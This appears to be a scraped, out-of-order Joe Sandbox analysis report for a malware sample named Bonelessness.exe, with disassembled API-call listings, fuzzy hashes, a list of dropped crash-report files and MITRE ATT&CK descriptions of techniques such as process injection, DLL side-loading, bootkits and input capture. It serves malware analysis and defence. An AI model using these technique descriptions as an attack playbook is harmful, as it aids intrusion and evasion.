GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?,02D2FCDD,00000000), ref: 02D2E2B2
HeapFree.KERNEL32(00000000,?,00000000,?,?,02D2FCDD,00000000), ref: 02D2E2B5

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate
String ID:
API String ID: 1670920773-0
Opcode ID: 7cef083d521555f66b7eedd5b4a8f027f30afa664a00ce7dd4dc36db1fd12669
Instruction ID: e42615934a20bc18bc768afe1671a22525e6ec60789b602cb4c9f74daf8225ba
Opcode Fuzzy Hash: 7cef083d521555f66b7eedd5b4a8f027f30afa664a00ce7dd4dc36db1fd12669
Instruction Fuzzy Hash: 182179B29052209FDB54CF79D88462A7BE9FA58218325897ED50BDB700D732EC56CFA0

Function 02D4ABF0 Relevance: 5.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02D4ABFE
malloc.MSVCRT ref: 02D4AC13
malloc.MSVCRT ref: 02D4AC39
malloc.MSVCRT ref: 02D4AC54

Part of subcall function 02D4A520: free.MSVCRT(?,?,?,75977310,?,02D4CA12,?,?,?,02D49E28), ref: 02D4A54F
Part of subcall function 02D4A520: free.MSVCRT(02D4CA12,?,?,75977310,?,02D4CA12,?,?,?,02D49E28), ref: 02D4A55F

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: d429053f432001c3e714c69af28851a93517db2fad9d22349513c617580852a5
Instruction ID: 1cf77baaaea6ba01c20bf430f69f5b46c5e79f9feb42aa1f735c9790113c97e0
Opcode Fuzzy Hash: d429053f432001c3e714c69af28851a93517db2fad9d22349513c617580852a5
Instruction Fuzzy Hash: 8921CAB1A013059FD710CF2AD884A46FBE8FF98310F15C5AAE5488B362D7B1E810CFA0

Function 02D2E840 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,-05ADF5B4,?,02D2FA47,?,?,02D2EF16,00000000,00000008,?,02D2FA47,Content-Length,00000008,?,02D2FA47,Transfer-Encoding), ref: 02D2E87F
HeapAlloc.KERNEL32(00000000,?,02D2EF16,00000000,00000008,?,02D2FA47,Content-Length,00000008,?,02D2FA47,Transfer-Encoding,00000008,HTTP/1.,00000007,?), ref: 02D2E886
memset.MSVCRT ref: 02D2E896
memcpy.MSVCRT ref: 02D2E8A1

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcessmemcpymemset
String ID:
API String ID: 471586229-0
Opcode ID: 96079ed5c2fb2cf6b41dd4c179035e0bff85420508497767b39761fd085c0b61
Instruction ID: 38b083f949e1b0c857703b896ac41bddd7e7faa3fd2613c13d37a367e129c017
Opcode Fuzzy Hash: 96079ed5c2fb2cf6b41dd4c179035e0bff85420508497767b39761fd085c0b61
Instruction Fuzzy Hash: 9401F7326416256B97209A69AC84FA7B39CEF96768B404251FD84DB380D720ED08C7F0

Function 02D3A860 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,00000018,?,00000000,?,02D3056E,?,?,02D30D4A,?), ref: 02D3A898
HeapAlloc.KERNEL32(00000000,?,02D3056E,?,?,02D30D4A,?), ref: 02D3A89F
memset.MSVCRT ref: 02D3A8AF
memcpy.MSVCRT ref: 02D3A8BD

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcessmemcpymemset
String ID:
API String ID: 471586229-0
Opcode ID: 8e819371a3761d7a6feb6aee09c8642a3b78063315fc6819a73625fae7bf1feb
Instruction ID: 86bd58d85499fdb0b43b02d3471e19ef307744f38e3941d0e48ec581af613212
Opcode Fuzzy Hash: 8e819371a3761d7a6feb6aee09c8642a3b78063315fc6819a73625fae7bf1feb
Instruction Fuzzy Hash: A50147326406066BD3228B6CDC48FABB79DEF42750F004315F9849B340EB21EC0587E0

Function 02D2F0D0 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,-05ADF5B5,?,?,00000000,?,02D2F31A,?,?,-05ADF5C8,00000000,00000000), ref: 02D2F0E8
HeapAlloc.KERNEL32(00000000,?,02D2F31A,?,?,-05ADF5C8,00000000,00000000), ref: 02D2F0EF
memset.MSVCRT ref: 02D2F0FF
memcpy.MSVCRT ref: 02D2F10A

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcessmemcpymemset
String ID:
API String ID: 471586229-0
Opcode ID: 64e435b9ad5dd333465d3f5e3bbf984072e5e8aefa95dfd13d60005b79e27be0
Instruction ID: 20776dd33be424962c2bcd1fada20033ce04ca55fe5ad88f153db83fffb0b451
Opcode Fuzzy Hash: 64e435b9ad5dd333465d3f5e3bbf984072e5e8aefa95dfd13d60005b79e27be0
Instruction Fuzzy Hash: 29F0E5736416213BC6226B99EC89F9B77ACEB97B64F804515FA04EB341CA20DD1487F0

Function 02D2E1D0 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,74DEF380,?,02D2E5D9,?,00000000,?,02D2FCAC), ref: 02D2E1E4
HeapValidate.KERNEL32(00000000,?,02D2FCAC), ref: 02D2E1E7
GetProcessHeap.KERNEL32(00000000,?,?,02D2FCAC), ref: 02D2E1F4
HeapFree.KERNEL32(00000000,?,02D2FCAC), ref: 02D2E1F7

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate
String ID:
API String ID: 1670920773-0
Opcode ID: c64f72be596c969dbf14858409846151556cf5e073b8e6b859d8a156104627ce
Instruction ID: 9d9aea647dbc6ee1f4927a1b25ccbfc0bdc64181aee4f52ca89cc8b69dae1ba5
Opcode Fuzzy Hash: c64f72be596c969dbf14858409846151556cf5e073b8e6b859d8a156104627ce
Instruction Fuzzy Hash: 07F039709412326AEB505B39A888B9BB79DAF69699F900450E408D7300EB25EC54DAB0

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Bonelessness.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Protection of GUI

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_JbrLYfXaOpqnSngA_13dca41ce65a82e21f128bc7bc6bedcf7faa20f2_548695df_4a306575-26df-4041-8147-103cd9c1135b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_JbrLYfXaOpqnSngA_13dca41ce65a82e21f128bc7bc6bedcf7faa20f2_548695df_8c47cea0-cae9-42a8-9da3-79baa364af96\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_JbrLYfXaOpqnSngA_13dca41ce65a82e21f128bc7bc6bedcf7faa20f2_548695df_902f3c5c-0108-482f-8f20-71da3efea5a6\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_JbrLYfXaOpqnSngA_13dca41ce65a82e21f128bc7bc6bedcf7faa20f2_548695df_9f1990f4-dd50-44aa-a7dc-af5c27e850f2\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC84.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERED21.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE2B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE5B.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE78.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE7A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEC9.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF06.tmp.csv

Windows Analysis Report
Bonelessness.exe

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre